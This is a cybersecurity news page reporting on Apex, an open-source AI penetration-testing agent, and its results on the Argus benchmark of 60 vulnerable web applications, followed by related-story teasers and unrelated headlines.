Categories: Cyber Security News

Apex – AI-Powered Pentester Attacks Apps in Black-Box Mode to Find Vulnerabilities

Apex is an autonomous, AI-powered penetration testing agent designed to operate in black-box mode against live applications. It does not require access to source code, hints, or predefined attack paths. This enables it to discover, chain, and verify real-world vulnerabilities at the speed required by modern software development.

The catalyst for Apex is a structural breakdown in how software security is being practiced. AI coding agents are generating and merging code at machine scale Stripe’s coding agents alone merge 1,300 pull requests per week, while some engineering teams spend over $1,000 daily in AI tokens per engineer with zero human code review.

Traditional scanners and human-led assessments cannot keep pace with this velocity. Apex was built as the adversarial verification layer: a separate agent that attacks the running application exactly as a real attacker would, catching vulnerabilities before they become breaches.

Apex operates across three deployment modes. In CI pipelines, it validates every deploy against a sandboxed replica of the application, mapping the attack surface and attempting exploitation before code merges.

Against production, it continuously surfaces exploitable weaknesses in real time. It also supports on-demand testing against any target replacing the quarterly PDF engagement with a feedback loop that operates at the speed of modern threats.

To validate its capabilities, PensarAI built Argus, an open-source benchmark of 60 self-contained, Dockerized vulnerable web applications purpose-built for evaluating offensive security agents.

Existing benchmarks were deemed insufficient: the most widely used suite, XBOW’s 104-challenge set, is 70% PHP, covers single-vulnerability targets, and lacks GraphQL, JWT algorithm confusion, race conditions, prototype pollution chains, WAF bypass, and multi-tenant isolation scenarios.

Argus spans the frameworks dominating production: Node.js/Express (40%), Python/Flask/Django (20%), multi-service architectures (25%), Go, Java/Spring Boot, and PHP.

It introduces categories no other benchmark covers: WAF and IDS evasion, multi-step exploit chains requiring up to 7 chained vulnerabilities, multi-tenant isolation failures, race conditions and business logic flaws, modern authentication bypasses (JWT, OAuth, SAML, MFA), and cloud/Kubernetes infrastructure attacks. Difficulty is calibrated across 2 easy, 27 medium, and 31 hard challenges.

271 Vulnerabilities Across 60 Applications

Apex was pointed at all 60 Argus challenges in full black-box mode using Claude Haiku 4.5, the smallest, cheapest model available, to isolate architectural gains over raw model capability.

Apex achieved a 35% pass rate, outperforming PentestGPT (30%) and Raptor (27%). On the top 10 hardest challenges using Claude Opus 4.6, the gap widened substantially: Apex solved 80%, PentestGPT reached 70%, and Raptor hit 60%.

Across the full run, Apex discovered 271 unique vulnerabilities spanning SQL injection, SSRF, NoSQL injection, prototype pollution, SSTI, XXE, race conditions, IDOR, auth bypass, CORS misconfigurations, command injection, and path traversal. The average cost per challenge was approximately $8, with the entire 60-challenge run on Haiku costing under $500.

Notable solves included a 7-step race-condition double-spend in a fintech transfer endpoint, a multi-tenant SSRF chain pivoting through a shared cache to extract API keys from neighboring tenants, and SpEL injection to RCE a Java Spring Boot application — all in under 15 minutes.

Apex’s documented failure modes are instructive. Last-mile execution, completing the final credential extraction step after a successful SSRF chain, emerged as the dominant gap. Decoy flags misled the agent twice, and complex multi-step chains such as CI/CD pipeline poisoning and Kubernetes compromise exceeded the 30-minute budget.

Both Apex and the Argus benchmark are available as open source on GitHub today.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Apex – AI-Powered Pentester Attacks Apps in Black-Box Mode to Find Vulnerabilities appeared first on Cyber Security News.

Cline AI Coding Agent Vulnerabilities Enables Prompt Injection, Code Execution, and Data Leakage

Cline is an open-source AI coding agent with 3.8 million installs and over 52,000 GitHub stars. Contains four critical security vulnerabilities that enable attackers to execute arbitrary code and exfiltrate sensitive data through malicious source code repositories. Mindgard researchers discovered the flaws during an audit of the popular VSCode extension,…

November 20, 2025

In "Cyber Security News"

AI’s ascendance as the apex predator of technology

Every technological era has its dominant force. Fifteen years ago, tech entrepreneur and investor Marc Andreessen proclaimed that “software is eating the world”, capturing the moment digital systems began reshaping entire industries. Today, that assertion still holds, but with a caveat — software itself is no longer the apex predator. Artificial intelligence…

March 16, 2026

In "AI"

Trend Micro Apex Central Vulnerabilities Enables Remote Code Execution Attacks

Critical security patches to address three severe vulnerabilities affecting Apex Central (on-premise) that could allow remote attackers to execute malicious code or launch denial-of-service attacks on vulnerable systems. Trend Micro issued the patches on January 7, 2026, urging all affected customers to update immediately. The most severe vulnerability, CVE-2025-69258, carries a…

January 9, 2026

In "Cyber Security News"

rssfeeds-admin

Next New ‘Speagle’ Malware Hijacks Cobra DocGuard to Steal Sensitive Data via Compromised Servers »

Previous « Heavy-Handed Probation and Parole in Pennsylvania Prevents People from Moving Forward

Project Hail Mary’s Ryan Gosling Confirms Marvel ‘Discussions’ to Play Ghost Rider

Ryan Gosling has confirmed he's had discussions with Marvel to play flame-headed hero Ghost Rider.…

28 seconds ago

‘I Saw the FBI Swarm in and the Helicopters Fly Over the Studio’ — Project Hail Mary Screenwriter Says Sony Hack Killed His ‘Big’ Spider-Man Movie About The Sinister Six

Project Hail Mary screenwriter Drew Goddard has said that the Sony hack of 2014 killed…

42 seconds ago

Crimson Desert’s Standout Feature is That It’s Crimson Desert

Cards on the table: I love Crimson Desert. And despite the mixed response it’s getting…

1 minute ago

Over Your Dead Body Review

This review is based on a screening at the South by Southwest Film & TV…

1 minute ago

TV News Check

Avid: Vast Majority Of Oscar-Winning Films Used Its Editing & Sound Tools

The post Avid: Vast Majority Of Oscar-Winning Films Used Its Editing & Sound Tools appeared…

26 minutes ago

TV News Check

Inside The Mighty Production Engine Behind The NCAA Men’s Basketball Tournament’s First Week

The post Inside The Mighty Production Engine Behind The NCAA Men’s Basketball Tournament’s First Week…

26 minutes ago

This website uses cookies.

Apex – AI-Powered Pentester Attacks Apps in Black-Box Mode to Find Vulnerabilities

271 Vulnerabilities Across 60 Applications

Related

Cline AI Coding Agent Vulnerabilities Enables Prompt Injection, Code Execution, and Data Leakage

AI’s ascendance as the apex predator of technology

Trend Micro Apex Central Vulnerabilities Enables Remote Code Execution Attacks

Recent Posts

Project Hail Mary’s Ryan Gosling Confirms Marvel ‘Discussions’ to Play Ghost Rider

‘I Saw the FBI Swarm in and the Helicopters Fly Over the Studio’ — Project Hail Mary Screenwriter Says Sony Hack Killed His ‘Big’ Spider-Man Movie About The Sinister Six

Crimson Desert’s Standout Feature is That It’s Crimson Desert

Over Your Dead Body Review

Avid: Vast Majority Of Oscar-Winning Films Used Its Editing & Sound Tools

Inside The Mighty Production Engine Behind The NCAA Men’s Basketball Tournament’s First Week

Apex – AI-Powered Pentester Attacks Apps in Black-Box Mode to Find Vulnerabilities

271 Vulnerabilities Across 60 Applications

Related

Related Post

Recent Posts